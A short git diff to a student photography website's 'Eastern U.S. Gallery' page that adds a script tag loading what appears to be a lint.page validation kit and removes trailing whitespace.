--- a/itis3135/natureinshutterspeed/east_gallery.html
+++ b/itis3135/natureinshutterspeed/east_gallery.html
@@ -2,6 +2,7 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <script src="https://lint.page/kit/4d0fe3.js" crossorigin="anonymous"></script>
   <title>Eastern U.S. Gallery - Nature In Shutter Speed</title>
   <link rel="stylesheet" href="styles/styles.css" />
   <link href="https://cdn.jsdelivr.net/npm/lightbox2@2/dist/css/lightbox.min.css" rel="stylesheet" />
@@ -38,7 +39,7 @@
       <a href="images/eastern/stlouisarch.jpg" data-lightbox="east-gallery"><img src="images/east/stlouisarch.jpg" alt="St. Louis Arch" loading="lazy" /></a>
       <a href="images/eastern/stlouisarch2.jpg" data-lightbox="east-gallery"><img src="images/east/stlouisarch2.jpg" alt="St. Louis Arch Night" loading="lazy" /></a>
     </section>
-    
+
   </main>
   <footer>
     <div data-include="components/footer.html"></div>
